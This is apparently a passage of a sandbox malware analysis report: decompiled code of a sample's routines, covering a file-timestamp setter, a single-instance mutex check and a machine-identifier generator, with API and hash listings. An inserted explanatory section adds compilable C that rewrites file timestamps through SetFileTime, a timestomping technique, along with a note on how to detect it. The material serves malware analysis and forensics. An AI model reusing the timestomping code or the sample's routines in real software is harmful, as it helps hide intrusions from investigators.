                          																		 *0x5d9bf8 = 3;
                          																		_t413 = 1;
                          																		goto L26;
                          																	}
                          																	goto L34;
                          																}
                          															} else {
                          																__eflags = 0;
                          																if(0 == 0) {
                          																	goto L66;
                          																} else {
                          																	goto L47;
                          																}
                          															}
                          														}
                          													}
                          												} else {
                          													E005D4520( *0x5d9bb8, 0x21);
                          													_t532 = _t527 + 8;
                          													__eflags =  *0x5d9ae8;
                          													_t500 = _a4;
                          													 *0x5d9bf8 = 3;
                          													_t151 =  *0x5d9ae8 != 0;
                          													__eflags = _t151;
                          													_t413 = 0 | _t151;
                          													L26:
                          													E005C3240(_v1300, _t500, 1);
                          													_t522 = _t532 + 0xc;
                          													L34:
                          													_t291 = _v1024;
                          													__eflags = _t291;
                          													if(_t291 != 0) {
                          														 *((intOrPtr*)( *_t291 + 8))(_t291);
                          													}
                          													_t292 = _v1080;
                          													__eflags = _t292;
                          													if(_t292 != 0) {
                          														 *((intOrPtr*)( *_t292 + 8))(_t292);
                          													}
                          													_t293 = _v1036;
                          													__eflags = _t293;
                          													if(_t293 != 0) {
                          														E005C91E0(_t293);
                          													}
                          													return _t413;
                          												}
                          											}
                          										} else {
                          											__eflags = 0;
                          											if(0 == 0) {
                          												goto L66;
                          											} else {
                          												goto L11;
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          				} else {
                          					_t536 =  *0x5d9bf4;
                          					if( *0x5d9bf4 == 0) {
                          						E005D4520( *0x5d9bb8, 0x6b);
                          						__eflags = 0;
                          						 *0x5d9bf8 = 0;
                          						return 0;
                          					} else {
                          						_push(_a4);
                          						return E005CDF00(_t536);
                          					}
                          				}
                          			}
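Added example, not part of the sample and not Joe Sandbox output: the code after the two int3 instructions (label L66 in the listing, entered at 0x005c704e) is a separate helper that the decompiler has run together with the preceding function. It opens the path with CreateFileW(path, 0x100, 1, 0, 3, 0, 0), that is FILE_WRITE_ATTRIBUTES, FILE_SHARE_READ and OPEN_EXISTING, converts up to three optional Unix time_t values with 0x989680 * t + 0xd53e8000 plus a carry into the high dword, and hands them to SetFileTime as creation, last-access and last-write time, returning nonzero only if SetFileTime succeeded. 0x989680 is 10,000,000 (100 ns ticks per second) and 0xd53e8000 is the low dword of 116444736000000000, the distance from 1601-01-01 to 1970-01-01 in 100 ns ticks; the high dword that the adc adds is not visible in the listing and is assumed here to be 0x019db1de, the value that completes that constant. The C below reproduces the conversion portably and wraps the Win32 calls under _WIN32; the struct and function names are the example's own, and the timestamp in main() is a constructed value.

```c
/* Added example: Unix time -> FILETIME -> SetFileTime, as the helper in the
 * listing does it. The conversion builds anywhere; the Win32 calls are
 * compiled only under _WIN32. Names are the example's own. */
#include <stdint.h>
#include <stddef.h>
#include <inttypes.h>
#include <stdio.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* 0x989680 in the listing: 100 ns ticks per second. */
#define TICKS_PER_SECOND 10000000ULL
/* 0x019db1de:d53e8000 = 116444736000000000 ticks from 1601-01-01 to
 * 1970-01-01. Only the low dword 0xd53e8000 appears in the listing; the
 * high dword 0x019db1de is assumed (it is the carry operand of the adc). */
#define EPOCH_DIFF_TICKS 116444736000000000ULL

/* Same layout as the Win32 FILETIME structure. */
typedef struct {
    uint32_t dwLowDateTime;
    uint32_t dwHighDateTime;
} ft_t;

/* t * 10,000,000 + offset, split into the two dwords the listing stores. */
ft_t unix_to_filetime(int64_t t)
{
    uint64_t ticks = (uint64_t)t * TICKS_PER_SECOND + EPOCH_DIFF_TICKS;
    ft_t ft;
    ft.dwLowDateTime  = (uint32_t)ticks;
    ft.dwHighDateTime = (uint32_t)(ticks >> 32);
    return ft;
}

/* Reassemble the 64-bit tick count from the two dwords. */
uint64_t filetime_ticks(ft_t ft)
{
    return ((uint64_t)ft.dwHighDateTime << 32) | ft.dwLowDateTime;
}

/* Inverse conversion, truncating sub-second ticks toward zero. */
int64_t filetime_to_unix(ft_t ft)
{
    int64_t ticks = (int64_t)filetime_ticks(ft) - (int64_t)EPOCH_DIFF_TICKS;
    return ticks / (int64_t)TICKS_PER_SECOND;
}

/* Equivalent of the helper: each pointer may be NULL, meaning leave that
 * timestamp untouched. Argument order is SetFileTime's: creation, last
 * access, last write. Returns 1 if SetFileTime succeeded, 0 otherwise. */
int set_file_times_unix(const wchar_t *path, const int64_t *creation,
                        const int64_t *last_access, const int64_t *last_write)
{
#ifdef _WIN32
    FILETIME c, a, w;
    FILETIME *pc = NULL, *pa = NULL, *pw = NULL;
    HANDLE h;
    BOOL ok;
    if (creation) {
        ft_t x = unix_to_filetime(*creation);
        c.dwLowDateTime = x.dwLowDateTime; c.dwHighDateTime = x.dwHighDateTime; pc = &c;
    }
    if (last_access) {
        ft_t x = unix_to_filetime(*last_access);
        a.dwLowDateTime = x.dwLowDateTime; a.dwHighDateTime = x.dwHighDateTime; pa = &a;
    }
    if (last_write) {
        ft_t x = unix_to_filetime(*last_write);
        w.dwLowDateTime = x.dwLowDateTime; w.dwHighDateTime = x.dwHighDateTime; pw = &w;
    }
    /* CreateFileW(path, 0x100, 1, 0, 3, 0, 0) in the listing. */
    h = CreateFileW(path, FILE_WRITE_ATTRIBUTES, FILE_SHARE_READ, NULL,
                    OPEN_EXISTING, 0, NULL);
    if (h == INVALID_HANDLE_VALUE)
        return 0;
    ok = SetFileTime(h, pc, pa, pw);
    CloseHandle(h);
    return ok != 0;
#else
    (void)path; (void)creation; (void)last_access; (void)last_write;
    return 0; /* no Win32 file-time API on this platform */
#endif
}

int main(void)
{
    /* Constructed value: 2019-10-21 00:00:00 UTC, the date in the sample name. */
    ft_t ft = unix_to_filetime(1571616000);
    printf("FILETIME low=0x%08" PRIx32 " high=0x%08" PRIx32 "\n",
           ft.dwLowDateTime, ft.dwHighDateTime);
    return 0;
}
```

SetFileTime rewrites the $STANDARD_INFORMATION timestamps that Explorer and dir display; NTFS keeps a second copy of the times in the $FILE_NAME attribute that this API does not update, which is the usual place to compare against when checking whether a file's times were set this way.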
                          0x005c3207
                          0x005c6811
                          0x005c6819
                          0x005c681f
                          0x005c6826
                          0x005c682a
                          0x005c682e
                          0x005c6832
                          0x005c6839
                          0x005c6840
                          0x005c6847
                          0x005c684e
                          0x005c6855
                          0x005c685c
                          0x005c6863
                          0x005c686a
                          0x005c6871
                          0x005c6878
                          0x005c687f
                          0x005c6886
                          0x005c688d
                          0x005c6894
                          0x005c689b
                          0x005c68a4
                          0x005c68a8
                          0x005c68b3
                          0x005c68c5
                          0x005c68de
                          0x005c68e9
                          0x005c68fb
                          0x005c6906
                          0x005c6911
                          0x005c6923
                          0x005c692e
                          0x005c6939
                          0x005c697a
                          0x005c697d
                          0x005c697f
                          0x005c6cb0
                          0x005c6cb2
                          0x005c6cb9
                          0x00000000
                          0x005c6985
                          0x005c6985
                          0x005c6994
                          0x005c6997
                          0x005c6999
                          0x005c6cc0
                          0x005c6cc2
                          0x005c6cc9
                          0x005c6cce
                          0x005c6cce
                          0x005c6ccf
                          0x005c6cd4
                          0x005c6cd7
                          0x005c6cd8
                          0x00000000
                          0x005c699f
                          0x005c699f
                          0x005c69a9
                          0x005c69ae
                          0x005c69b1
                          0x005c69b6
                          0x005c6cfa
                          0x005c6cfa
                          0x005c6cfc
                          0x00000000
                          0x005c69bc
                          0x005c69c4
                          0x005c69c9
                          0x005c69cc
                          0x005c69ce
                          0x005c6d3e
                          0x00000000
                          0x005c69d4
                          0x005c69d4
                          0x005c69de
                          0x005c69f0
                          0x005c69f5
                          0x005c69fc
                          0x005c6a02
                          0x005c6a09
                          0x005c6a0e
                          0x005c6a18
                          0x005c6a22
                          0x005c6a29
                          0x005c6a30
                          0x005c6a37
                          0x005c6a3f
                          0x005c6a47
                          0x005c6a4e
                          0x005c6a58
                          0x005c6a5f
                          0x005c6a68
                          0x005c6a70
                          0x005c6a76
                          0x005c6a78
                          0x005c6a7c
                          0x005c704e
                          0x005c704e
                          0x005c704f
                          0x005c7050
                          0x005c7053
                          0x005c7054
                          0x005c7055
                          0x005c705c
                          0x005c706d
                          0x005c7073
                          0x005c7076
                          0x005c707c
                          0x005c707f
                          0x005c7081
                          0x005c7088
                          0x005c708d
                          0x005c708f
                          0x005c7096
                          0x005c709c
                          0x005c709c
                          0x005c70a3
                          0x005c70a5
                          0x005c70a7
                          0x005c70a7
                          0x005c70aa
                          0x005c70ad
                          0x005c70af
                          0x005c70bb
                          0x005c70c1
                          0x005c70c1
                          0x005c70c8
                          0x005c70ca
                          0x005c70cc
                          0x005c70cc
                          0x005c70d2
                          0x005c70d4
                          0x005c710b
                          0x005c710b
                          0x005c70d6
                          0x005c70d6
                          0x005c70de
                          0x005c70e7
                          0x005c70f1
                          0x005c70f9
                          0x005c70fd
                          0x005c7101
                          0x005c7104
                          0x005c7106
                          0x005c7106
                          0x005c7111
                          0x005c7119
                          0x005c711b
                          0x005c711b
                          0x005c711b
                          0x005c711f
                          0x005c711f
                          0x005c712e
                          0x005c6a82
                          0x005c6a8a
                          0x005c6a8e
                          0x005c6a99
                          0x005c6aa0
                          0x005c6aab
                          0x005c6ab8
                          0x005c6abd
                          0x005c6ac0
                          0x005c6ac4
                          0x005c6ac7
                          0x005c6acf
                          0x005c6ad5
                          0x005c6ad7
                          0x005c6ad9
                          0x005c6ae3
                          0x005c6ae3
                          0x005c6ae7
                          0x005c6aed
                          0x005c6af2
                          0x005c6af5
                          0x005c6afc
                          0x005c6afe
                          0x005c6b0d
                          0x005c6b13
                          0x005c6b15
                          0x005c6b17
                          0x00000000
                          0x005c6b1d
                          0x005c6b1d
                          0x005c6b23
                          0x005c6b2e
                          0x005c6b39
                          0x005c6b44
                          0x005c6b56
                          0x005c6b61
                          0x005c6b6c
                          0x005c6b7e
                          0x005c6b89
                          0x005c6b94
                          0x005c6b9f
                          0x005c6be0
                          0x005c6be3
                          0x005c6be7
                          0x005c6be9
                          0x005c6bed
                          0x005c6bef
                          0x005c6bf1
                          0x005c6bf3
                          0x005c6bf6
                          0x005c6bfc
                          0x005c6bfc
                          0x005c6c02
                          0x005c6c05
                          0x005c6c07
                          0x005c6c0a
                          0x005c6c0f
                          0x005c6c0f
                          0x005c6c13
                          0x005c6c18
                          0x005c6c18
                          0x005c6c1b
                          0x005c6c1f
                          0x005c6c26
                          0x005c6c28
                          0x005c6c2a
                          0x005c6c2c
                          0x005c6c2f
                          0x005c6c35
                          0x005c6c35
                          0x005c6c3b
                          0x005c6c3e
                          0x005c6c40
                          0x005c6c43
                          0x005c6c48
                          0x005c6c48
                          0x005c6c4c
                          0x005c6c51
                          0x005c6c51
                          0x005c6c54
                          0x005c6c5f
                          0x005c6c69
                          0x005c6c6c
                          0x005c6c6e
                          0x005c6c70
                          0x005c6d53
                          0x005c6d59
                          0x005c7018
                          0x005c701b
                          0x005c7020
                          0x005c7023
                          0x00000000
                          0x005c6d5f
                          0x005c6d69
                          0x005c6d6e
                          0x005c6d71
                          0x005c6d73
                          0x005c702a
                          0x005c6d43
                          0x005c6d43
                          0x005c6d49
                          0x005c6d4e
                          0x00000000
                          0x005c6d79
                          0x005c6d83
                          0x005c6d8f
                          0x005c6d94
                          0x005c6d99
                          0x005c6d9b
                          0x005c6dab
                          0x005c6db9
                          0x005c6dbd
                          0x005c6dcb
                          0x005c6dd7
                          0x005c6de7
                          0x005c6df2
                          0x005c6df6
                          0x005c6e01
                          0x005c6e0a
                          0x005c6e14
                          0x005c6e18
                          0x005c6e20
                          0x005c6e24
                          0x005c6e2c
                          0x005c6e36
                          0x005c6e3b
                          0x005c6e3e
                          0x005c6e42
                          0x005c6e45
                          0x005c6e4d
                          0x005c6e53
                          0x005c6e55
                          0x005c6e59
                          0x005c6e5b
                          0x005c6e65
                          0x005c6e65
                          0x005c6e6b
                          0x005c6e70
                          0x005c6e73
                          0x005c6e7a
                          0x005c6e7c
                          0x005c6e8b
                          0x005c6e91
                          0x005c6e93
                          0x005c6e95
                          0x00000000
                          0x005c6e9b
                          0x005c6e9b
                          0x005c6ea1
                          0x005c6eac
                          0x005c6eb7
                          0x005c6ebf
                          0x005c6ecb
                          0x005c6ed3
                          0x005c6edb
                          0x005c6ee3
                          0x005c6eeb
                          0x005c6ef3
                          0x005c6efb
                          0x005c6f03
                          0x005c6f50
                          0x005c6f54
                          0x005c6f58
                          0x005c6f5a
                          0x005c6f5c
                          0x005c6f5e
                          0x005c6f61
                          0x005c6f67
                          0x005c6f67
                          0x005c6f6d
                          0x005c6f70
                          0x005c6f72
                          0x005c6f75
                          0x005c6f7a
                          0x005c6f7a
                          0x005c6f7e
                          0x005c6f83
                          0x005c6f83
                          0x005c6f86
                          0x005c6f8a
                          0x005c6f8d
                          0x005c6f94
                          0x005c6f98
                          0x005c6f9a
                          0x005c6f9c
                          0x005c6f9e
                          0x005c6fa1
                          0x005c6fa7
                          0x005c6fab
                          0x005c6fab
                          0x005c6fb1
                          0x005c6fb4
                          0x005c6fb6
                          0x005c6fb9
                          0x005c6fbe
                          0x005c6fc2
                          0x005c6fc2
                          0x005c6fc6
                          0x005c6fcb
                          0x005c6fcb
                          0x005c6fd3
                          0x005c6fdd
                          0x005c6fe0
                          0x005c6fe2
                          0x005c6fe6
                          0x005c6fe8
                          0x005c7040
                          0x005c7043
                          0x005c7048
                          0x005c704b
                          0x005c7024
                          0x005c7024
                          0x005c6cd9
                          0x005c6cd9
                          0x005c6cde
                          0x005c6ce4
                          0x005c6ce9
                          0x005c6cec
                          0x005c6cec
                          0x005c6cee
                          0x005c6d06
                          0x005c6d06
                          0x005c6d06
                          0x005c6fea
                          0x005c6ff2
                          0x005c6ff7
                          0x005c6ffc
                          0x005c7006
                          0x00000000
                          0x005c7006
                          0x00000000
                          0x005c6fe8
                          0x005c6e5d
                          0x005c6e5d
                          0x005c6e5f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005c6e5f
                          0x005c6e5b
                          0x005c6d73
                          0x005c6c76
                          0x005c6c7e
                          0x005c6c83
                          0x005c6c88
                          0x005c6c8f
                          0x005c6c92
                          0x005c6c9c
                          0x005c6c9c
                          0x005c6c9c
                          0x005c6c9f
                          0x005c6ca6
                          0x005c6cab
                          0x005c6d07
                          0x005c6d07
                          0x005c6d0b
                          0x005c6d0d
                          0x005c6d12
                          0x005c6d12
                          0x005c6d15
                          0x005c6d19
                          0x005c6d1b
                          0x005c6d20
                          0x005c6d20
                          0x005c6d23
                          0x005c6d27
                          0x005c6d29
                          0x005c6d2c
                          0x005c6d31
                          0x005c6d3d
                          0x005c6d3d
                          0x005c6c70
                          0x005c6adb
                          0x005c6adb
                          0x005c6add
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x005c6add
                          0x005c6ad9
                          0x005c6a7c
                          0x005c69ce
                          0x005c69b6
                          0x005c6999
                          0x005c320d
                          0x005c320d
                          0x005c3214
                          0x005c322b
                          0x005c3233
                          0x005c3235
                          0x005c323f
                          0x005c3216
                          0x005c3216
                          0x005c3222
                          0x005c3222
                          0x005c3214

                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: 4b6f3a3c9203362486197b2addf489451b87431dc79de74f0321c20a14dba732
                          • Instruction ID: 95655cdd0682511c213526bbcdd4ca2736ebba95df780cfc55feb49615dfa5bf
                          • Opcode Fuzzy Hash: 4b6f3a3c9203362486197b2addf489451b87431dc79de74f0321c20a14dba732
                          • Instruction Fuzzy Hash: B132E2B5A08341AFD725DF64D884B9BBBE5FF88300F00882EF98997351E771A944DB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 404 5c7340-5c7356 405 5c7358-5c735f CloseHandle 404->405 406 5c7365-5c7384 call 5d4520 ConvertStringSecurityDescriptorToSecurityDescriptorW 404->406 405->406 409 5c738f-5c7393 406->409 410 5c7386-5c738d 406->410 411 5c739a-5c73c8 call 5d3200 CreateMutexW 409->411 410->411 414 5c73ca-5c73d1 LocalFree 411->414 415 5c73d3-5c73d5 411->415 414->415 416 5c73e9 415->416 417 5c73d7-5c73e2 GetLastError 415->417 419 5c73eb-5c73f4 416->419 417->416 418 5c73e4-5c73e7 417->418 418->419
                          C-Code - Quality: 64%
                          			E005C7340(void** __ecx) {
                          				// Single-instance check: creates a named mutex with an explicit security
                          				// descriptor and reports whether that mutex already existed.
                          				char _v212;
                          				void* _v232;
                          				void* _v236;
                          				char _v240;
                          				void* _t6;
                          				void* _t9;
                          				void* _t10;
                          				void* _t12;
                          				struct _SECURITY_ATTRIBUTES* _t19;
                          				void* _t21;
                          				WCHAR* _t22;
                          				void** _t23;
                          				void** _t24;
                          				void** _t25;
                          
                          				 *_t24 = 0;
                          				_t23 = __ecx;
                          				_t6 =  *__ecx;
                          				if(_t6 != 0) {
                          					// Release a previously held mutex handle before recreating it.
                          					CloseHandle(_t6);
                          					 *_t23 = 0;
                          				}
                          				_t22 =  &_v212;
                          				// E005D4520 writes the string that is passed below as the SDDL security descriptor.
                          				E005D4520(_t22, 0x25);
                          				_t25 =  &(_t24[2]);
                          				// Indirect call through an import pointer: ConvertStringSecurityDescriptorToSecurityDescriptorW
                          				// (sddl, SDDL_REVISION_1, &pSecurityDescriptor, NULL), see APIs ref 005C737C.
                          				_t9 =  *0x5d9e54(_t22, 1, _t25, 0); // executed
                          				_t28 = _t9;
                          				if(_t9 == 0) {
                          					// Conversion failed: fall back to default security (NULL lpMutexAttributes).
                          					_t10 = 0;
                          					_t19 = 0;
                          					__eflags = 0;
                          					 *_t25 = 0;
                          				} else {
                          					_t10 =  *_t25;
                          					_t19 =  &_v240;
                          				}
                          				_v240 = 0xc; // SECURITY_ATTRIBUTES.nLength == sizeof(SECURITY_ATTRIBUTES) on 32-bit
                          				_v232 = 0;   // bInheritHandle = FALSE
                          				_v236 = _t10; // lpSecurityDescriptor
                          				// E005D3200 (GetWindowsDirectoryW / GetVolumeInformationW, see below) overwrites the
                          				// same buffer with the mutex name.
                          				_push(_t22);
                          				E005D3200(_t28);
                          				_t12 = CreateMutexW(_t19, 1, _t22); // executed; bInitialOwner = TRUE
                          				 *_t23 = _t12;
                          				_t21 = _t25[1];
                          				if(_t21 != 0) {
                          					// Free the security descriptor allocated by the conversion call.
                          					LocalFree(_t21);
                          					_t12 =  *_t23;
                          				}
                          				// 0xb7 == ERROR_ALREADY_EXISTS: returns 1 only when the mutex was already present,
                          				// i.e. another instance is running.
                          				if(_t12 == 0 || GetLastError() != 0xb7) {
                          					__eflags = 0;
                          					return 0;
                          				} else {
                          					return 1;
                          				}
                          			}

                          0x005c7349
                          0x005c7350
                          0x005c7352
                          0x005c7356
                          0x005c7359
                          0x005c735f
                          0x005c735f
                          0x005c7365
                          0x005c736c
                          0x005c7371
                          0x005c737c
                          0x005c7382
                          0x005c7384
                          0x005c738f
                          0x005c7391
                          0x005c7391
                          0x005c7393
                          0x005c7386
                          0x005c7386
                          0x005c7389
                          0x005c7389
                          0x005c739a
                          0x005c73a2
                          0x005c73aa
                          0x005c73ae
                          0x005c73af
                          0x005c73bb
                          0x005c73c1
                          0x005c73c3
                          0x005c73c8
                          0x005c73cb
                          0x005c73d1
                          0x005c73d1
                          0x005c73d5
                          0x005c73e9
                          0x00000000
                          0x005c73e4
                          0x00000000
                          0x005c73e6

                          APIs
                          • CloseHandle.KERNEL32(00000000), ref: 005C7359
                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,?,00000000), ref: 005C737C
                          • CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 005C73BB
                          • LocalFree.KERNEL32 ref: 005C73CB
                          • GetLastError.KERNEL32 ref: 005C73D7
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: DescriptorSecurity$CloseConvertCreateErrorFreeHandleLastLocalMutexString
                          • String ID:
                          • API String ID: 1087375019-0
                          • Opcode ID: 635460c2dba0fafb1261cd58f2092833db9b9c28f0727ddb1bb9fcefad275c0a
                          • Instruction ID: 5a698cc2a193f1435d002e2dece274a48e85658622f831b8b49e58e6ed296375
                          • Opcode Fuzzy Hash: 635460c2dba0fafb1261cd58f2092833db9b9c28f0727ddb1bb9fcefad275c0a
                          • Instruction Fuzzy Hash: B1114670619205AFE7209F65DC89F2B7FE8BF94B01F004C2EF885D6280D77988489B62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 420 5d5d00-5d5d15 421 5d5d27-5d5d49 GetVersionExW call 5c3180 420->421 422 5d5d17-5d5d19 420->422 423 5d5d1a-5d5d26 421->423 426 5d5d4b-5d5d5f GetComputerNameW 421->426 422->423 427 5d5d68-5d5d80 call 5c3180 GetComputerNameW 426->427 428 5d5d61-5d5d66 426->428 429 5d5d85-5d5d93 call 5d31c0 427->429 428->429 434 5d5d97-5d5d9e 429->434 435 5d5da8-5d5daa 434->435 436 5d5da0-5d5da6 434->436 437 5d5dac-5d5de7 call 5d4520 call 5d68e0 435->437 438 5d5dea-5d5df0 435->438 436->434 436->435 437->438 440 5d5e07-5d5e0e 438->440 441 5d5df2 438->441 440->423 443 5d5df4-5d5df9 441->443 445 5d5dfb-5d5dfe 443->445 446 5d5e13-5d5e19 443->446 445->443 448 5d5e00 445->448 449 5d5e1c 446->449 448->440 450 5d5e1e-5d5e2b call 5c8160 449->450 453 5d5e2d-5d5e30 450->453 454 5d5e32-5d5e62 Sleep 450->454 453->450 453->454 454->449 455 5d5e64-5d5e82 call 5c3180 454->455 458 5d5e84-5d5e8d 455->458 459 5d5ea3-5d5ea5 455->459 460 5d5e8f-5d5e95 call 5c91e0 458->460 461 5d5e98 458->461 459->423 460->461 461->459
                          C-Code - Quality: 97%
                          			E005D5D00(signed int __edx) {
                          				struct _OSVERSIONINFOW* _t26;
                          				WCHAR* _t28;
                          				int _t30;
                          				WCHAR* _t31;
                          				WCHAR* _t34;
                          				signed int _t35;
                          				signed int _t39;
                          				intOrPtr _t41;
                          				intOrPtr _t42;
                          				WCHAR* _t48;
                          				signed short _t49;
                          				signed int _t52;
                          				signed int _t53;
                          				void* _t59;
                          				signed short _t61;
                          				signed short _t62;
                          				intOrPtr _t63;
                          				DWORD* _t65;
                          				signed int _t66;
                          				signed short _t67;
                          				WCHAR* _t68;
                          				void* _t69;
                          				intOrPtr* _t72;
                          				DWORD* _t73;
                          				signed int* _t74;
                          				signed int* _t77;
                          				void* _t78;
                          
                          				_t58 = __edx;
                          				_t61 = 0;
                          				_t78 =  *0x5d9ac0 - _t61; // 0x27a398
                          				 *_t72 = 0;
                          				if(_t78 == 0) {
                          					_t26 = _t72 + 8;
                          					_t26->dwOSVersionInfoSize = 0x11c; // sizeof(OSVERSIONINFOEXW)
                          					GetVersionExW(_t26);
                          					_t28 = E005C3180(0x410, 0);
                          					_t73 = _t72 + 8;
                          					if(_t28 == 0) {
                          						L2:
                          						return _t61;
                          					}
                          					_t65 = _t73;
                          					_t48 = _t28;
                          					 *_t65 = 0x208; // buffer size in WCHARs (0x410 bytes allocated above)
                          					_t30 = GetComputerNameW(_t28, _t65); // executed
                          					if(_t30 == 0) {
                          						_t31 = E005C3180(0x474, _t48);
                          						_t73 =  &(_t73[2]);
                          						_t48 = _t31;
                          						GetComputerNameW(_t31, _t65);
                          						_t66 = 0x23a;
                          					} else {
                          						_t66 = 0x208;
                          					}
                          					E005D31C0(_t48, 0x5f);
                          					_t74 =  &(_t73[2]);
                          					_t68 =  &(_t48[_t66]);
                          					_t74[1] = _t48;
                          					do {
                          						_t34 = _t48;
                          						_t48 =  &(_t48[1]);
                          					} while (_t34 < _t68 && ( *_t34 & 0x0000ffff) != 0);
                          					if(_t34 < _t68) {
                          						 *((intOrPtr*)(_t48 - 2)) = 0x57005f; // UTF-16LE L"_W" appended to the computer name
                          						E005D4520( &(_t74[0x49]), 0x76);
                          						_t77 =  &(_t74[2]);
                          						_push(_t77[5]);
                          						_push(_t77[5]);
                          						E005D68E0( &(_t48[1]), _t68 -  &(_t48[1]) >> 1,  &(_t77[0x4c]), _t77[5]);
                          						_t74 =  &(_t77[6]);
                          					}
                          					_t52 = _t74[1];
                          					if(_t52 == 0) {
                          						L17:
                          						 *_t74 = 0;
                          						goto L2;
                          					} else {
                          						_t35 = 0;
                          						while( *((short*)(_t52 + _t35 * 2)) != 0) {
                          							_t35 = _t35 + 1;
                          							if(_t66 != _t35) {
                          								continue;
                          							}
                          							 *_t74 = 0;
                          							goto L17;
                          						}
                          						_t69 = 0;
                          						_t62 = 0;
                          						_t49 = 0;
                          						 *_t74 = _t35;
                          						// Append 0x20 (32) characters, each a 4-bit value from E005C8160 (GetTickCount
                          						// based, see APIs) mapped into a printable range; the ternary's condition was
                          						// not recovered by the decompiler.
                          						do {
                          							_t67 = _t49;
                          							do {
                          								_t49 = E005C8160(_t58) & 0x0000000f;
                          							} while (_t49 == _t67 && _t49 == _t62);
                          							Sleep(1);
                          							_t53 = _t49 & 0x0000ffff;
                          							_t39 =  *_t74;
                          							_t62 = _t67;
                          							_t59 = _t53 + 0x41; // 'A' + value
                          							_t55 =  <=  ? _t59 : _t53 + 0x2a;
                          							_t69 = _t69 + 1;
                          							 *((short*)(_t74[1] + _t39 * 2)) =  <=  ? _t59 : _t53 + 0x2a;
                          							_t19 = _t39 + 1; // 0x1
                          							_t58 = _t19;
                          							 *_t74 = _t19;
                          						} while (_t69 != 0x20);
                          						 *((short*)(_t74[1] + 2 + _t39 * 2)) = 0;
                          						 *_t74 = _t39 + _t39 + 4;
                          						_t41 = E005C3180(_t39 + _t39 + 4, _t74[1]);
                          						if(_t41 == 0) {
                          							_t61 = 0;
                          							goto L2;
                          						}
                          						_t63 = _t41;
                          						_t42 =  *0x5d9ac0; // 0x27a398
                          						if(_t42 != 0) {
                          							E005C91E0(_t42);
                          						}
                          						 *0x5d9ac0 = _t63; // cache the generated identifier; the check at entry skips regeneration
                          						goto L1;
                          					}
                          				}
                          				L1:
                          				_t61 = 1;
                          				goto L2;
                          			}

                          0x005d5d00
                          0x005d5d0a
                          0x005d5d0c
                          0x005d5d12
                          0x005d5d15
                          0x005d5d27
                          0x005d5d2b
                          0x005d5d32
                          0x005d5d3f
                          0x005d5d44
                          0x005d5d49
                          0x005d5d1a
                          0x005d5d26
                          0x005d5d26
                          0x005d5d4b
                          0x005d5d4d
                          0x005d5d4f
                          0x005d5d57
                          0x005d5d5f
                          0x005d5d6e
                          0x005d5d73
                          0x005d5d76
                          0x005d5d7a
                          0x005d5d80
                          0x005d5d61
                          0x005d5d61
                          0x005d5d61
                          0x005d5d88
                          0x005d5d8d
                          0x005d5d90
                          0x005d5d93
                          0x005d5d97
                          0x005d5d97
                          0x005d5d99
                          0x005d5d9c
                          0x005d5daa
                          0x005d5dac
                          0x005d5dc0
                          0x005d5dc5
                          0x005d5dcc
                          0x005d5dd0
                          0x005d5de2
                          0x005d5de7
                          0x005d5de7
                          0x005d5dea
                          0x005d5df0
                          0x005d5e07
                          0x005d5e07
                          0x00000000
                          0x005d5df2
                          0x005d5df2
                          0x005d5df4
                          0x005d5dfb
                          0x005d5dfe
                          0x00000000
                          0x00000000
                          0x005d5e00
                          0x00000000
                          0x005d5e00
                          0x005d5e13
                          0x005d5e15
                          0x005d5e17
                          0x005d5e19
                          0x005d5e1c
                          0x005d5e1c
                          0x005d5e1e
                          0x005d5e25
                          0x005d5e28
                          0x005d5e36
                          0x005d5e3c
                          0x005d5e3f
                          0x005d5e42
                          0x005d5e44
                          0x005d5e4d
                          0x005d5e54
                          0x005d5e58
                          0x005d5e5c
                          0x005d5e5c
                          0x005d5e5f
                          0x005d5e5f
                          0x005d5e68
                          0x005d5e73
                          0x005d5e78
                          0x005d5e82
                          0x005d5ea3
                          0x00000000
                          0x005d5ea3
                          0x005d5e84
                          0x005d5e86
                          0x005d5e8d
                          0x005d5e90
                          0x005d5e95
                          0x005d5e98
                          0x00000000
                          0x005d5e98
                          0x005d5df0
                          0x005d5d17
                          0x005d5d19
                          0x00000000

                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 005D5D32
                          • GetComputerNameW.KERNEL32(00000000), ref: 005D5D57
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          • GetComputerNameW.KERNEL32(00000000), ref: 005D5D7A
                            • Part of subcall function 005C8160: GetTickCount.KERNEL32(?,?,?,005C9394), ref: 005C8169
                          • Sleep.KERNEL32(00000001), ref: 005D5E36
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
